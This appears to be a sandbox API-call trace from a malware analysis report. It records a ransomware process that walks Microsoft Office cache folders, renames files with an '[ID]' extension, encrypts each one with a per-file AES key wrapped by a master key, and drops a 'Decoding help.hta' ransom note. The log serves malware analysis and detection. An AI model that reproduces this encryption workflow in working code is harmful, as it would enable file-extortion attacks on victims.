returned 1 [0041.780] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0041.780] CreateFileMappingA (hFile=0x474, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x478 [0041.781] CryptAcquireContextA (in: phProv=0x440fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x440fcec*=0x3448610) returned 1 [0044.956] CryptGenKey (in: hProv=0x3448610, Algid=0x6610, dwFlags=0x1, phKey=0x440fce8 | out: phKey=0x440fce8*=0x5d8250) returned 1 [0044.956] CryptExportKey (in: hKey=0x5d8250, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x440fbe4, pdwDataLen=0x440fce4 | out: pbData=0x440fbe4*, pdwDataLen=0x440fce4*=0x2c) returned 1 [0044.956] MapViewOfFile (hFileMappingObject=0x478, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91960) returned 0x13a20000 [0044.972] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x440fbe4*, pdwDataLen=0x440fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x440fbe4*, pdwDataLen=0x440fcf8*=0x100) returned 1 [0044.972] CryptEncrypt (in: hKey=0x5d8250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x13a20000, pdwDataLen=0x440fce4*=0x91960, dwBufLen=0x91960 | out: pbData=0x13a20000*, pdwDataLen=0x440fce4*=0x91960) returned 1 [0045.196] UnmapViewOfFile (lpBaseAddress=0x13a20000) returned 1 [0045.203] CloseHandle (hObject=0x478) returned 1 [0045.203] CryptDestroyKey (hKey=0x5d8250) returned 1 [0045.203] CryptReleaseContext (hProv=0x3448610, dwFlags=0x0) returned 1 [0045.203] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.203] WriteFile (in: hFile=0x474, lpBuffer=0x440fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x440fcf8, lpOverlapped=0x0 | out: lpBuffer=0x440fbe4*, lpNumberOfBytesWritten=0x440fcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.426] WriteFile (in: hFile=0x474, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x440fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x440fcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.426] CloseHandle (hObject=0x474) returned 1 [0045.432] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.433] FindNextFileW (in: hFindFile=0x5d8310, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0048.516] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0048.516] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0048.516] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0048.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0048.516] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DW20.EXE") returned -1 [0048.516] lstrlenW (lpString="DW20.EXE") returned 8 [0048.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0048.516] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0048.516] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="DW20.EXE" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" [0048.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" [0048.516] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]" [0048.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.055] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0052.055] CreateFileMappingA (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0052.056] CryptAcquireContextA (in: phProv=0x440fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x440fcec*=0x344a128) returned 1 [0054.896] CryptGenKey (in: hProv=0x344a128, Algid=0x6610, dwFlags=0x1, phKey=0x440fce8 | out: phKey=0x440fce8*=0x5d8b50) returned 1 [0054.896] CryptExportKey (in: hKey=0x5d8b50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x440fbe4, pdwDataLen=0x440fce4 | out: pbData=0x440fbe4*, pdwDataLen=0x440fce4*=0x2c) returned 1 [0054.896] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xccb80) returned 0x6eb0000 [0054.908] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x440fbe4*, pdwDataLen=0x440fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x440fbe4*, pdwDataLen=0x440fcf8*=0x100) returned 1 [0054.908] CryptEncrypt (in: hKey=0x5d8b50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6eb0000, pdwDataLen=0x440fce4*=0xccb80, dwBufLen=0xccb80 | out: pbData=0x6eb0000*, pdwDataLen=0x440fce4*=0xccb80) returned 1 [0055.128] UnmapViewOfFile (lpBaseAddress=0x6eb0000) returned 1 [0055.684] CloseHandle (hObject=0x318) returned 1 [0055.684] CryptDestroyKey (hKey=0x5d8b50) returned 1 [0055.684] CryptReleaseContext (hProv=0x344a128, dwFlags=0x0) returned 1 [0055.684] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.684] WriteFile (in: hFile=0x450, lpBuffer=0x440fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x440fcf8, lpOverlapped=0x0 | out: lpBuffer=0x440fbe4*, lpNumberOfBytesWritten=0x440fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.216] WriteFile (in: hFile=0x450, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x440fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x440fcf8*=0x500, lpOverlapped=0x0) returned 1 [0057.488] CloseHandle (hObject=0x450) returned 1 [0057.488] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0057.488] FindNextFileW (in: hFindFile=0x5d8310, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0057.488] lstrcpyW (in: lpString1=0x971a1c8, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0057.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0057.488] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0057.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0057.489] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dwdcw20.dll") returned -1 [0057.489] lstrlenW (lpString="dwdcw20.dll") returned 11 [0057.489] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0057.489] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0057.489] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="dwdcw20.dll" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" [0057.489] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" [0057.489] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.489] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0057.490] CreateFileMappingA (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x968 [0057.490] CryptAcquireContextA (in: phProv=0x440fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x440fcec*=0x3449688) returned 1 [0060.145] CryptGenKey (in: hProv=0x3449688, Algid=0x6610, dwFlags=0x1, phKey=0x440fce8 | out: phKey=0x440fce8*=0x5e2a70) returned 1 [0060.145] CryptExportKey (in: hKey=0x5e2a70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x440fbe4, pdwDataLen=0x440fce4 | out: pbData=0x440fbe4*, pdwDataLen=0x440fce4*=0x2c) returned 1 [0060.145] MapViewOfFile (hFileMappingObject=0x968, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80760) returned 0x4740000 [0062.967] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x440fbe4*, pdwDataLen=0x440fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x440fbe4*, pdwDataLen=0x440fcf8*=0x100) returned 1 [0062.967] CryptEncrypt (hKey=0x5e2a70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4740000, pdwDataLen=0x440fce4*=0x80760, dwBufLen=0x80760) Thread: id = 143 os_tid = 0x774 [0040.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7e90 [0041.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.789] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.789] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.789] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.789] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0041.789] lstrcmpW (lpString1=".", lpString2="Access.en-us") returned -1 [0041.789] lstrcmpW (lpString1="..", lpString2="Access.en-us") returned -1 [0041.790] lstrcmpiW (lpString1="windows", lpString2="Access.en-us") returned 1 [0041.792] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0041.792] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.792] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="Access.en-us" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us" [0041.792] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*.*" [0041.792] GlobalMemoryStatus (in: lpBuffer=0x47cfd10 | out: lpBuffer=0x47cfd10) [0041.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e70ba8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x48c [0041.793] CloseHandle (hObject=0x48c) returned 1 [0041.793] FindNextFileW (in: hFindFile=0x5d7e90, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0041.793] lstrcpyW (in: lpString1=0x98aa858, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0041.793] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.793] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.793] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0041.794] WriteFile (in: hFile=0x48c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x47cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x47cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.795] CloseHandle (hObject=0x48c) returned 1 [0041.795] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.795] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AccessMUISet.msi") returned 1 [0041.795] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0041.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0041.795] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.795] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="AccessMUISet.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" [0041.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" [0041.795] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.796] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0041.796] CreateFileMappingA (hFile=0x48c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x490 [0041.796] CryptAcquireContextA (in: phProv=0x47cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x47cfcec*=0x3449df8) returned 1 [0044.982] CryptGenKey (in: hProv=0x3449df8, Algid=0x6610, dwFlags=0x1, phKey=0x47cfce8 | out: phKey=0x47cfce8*=0x5d7e50) returned 1 [0044.982] CryptExportKey (in: hKey=0x5d7e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x47cfbe4, pdwDataLen=0x47cfce4 | out: pbData=0x47cfbe4*, pdwDataLen=0x47cfce4*=0x2c) returned 1 [0044.983] MapViewOfFile (hFileMappingObject=0x490, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd4200) returned 0x13ac0000 [0044.995] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, 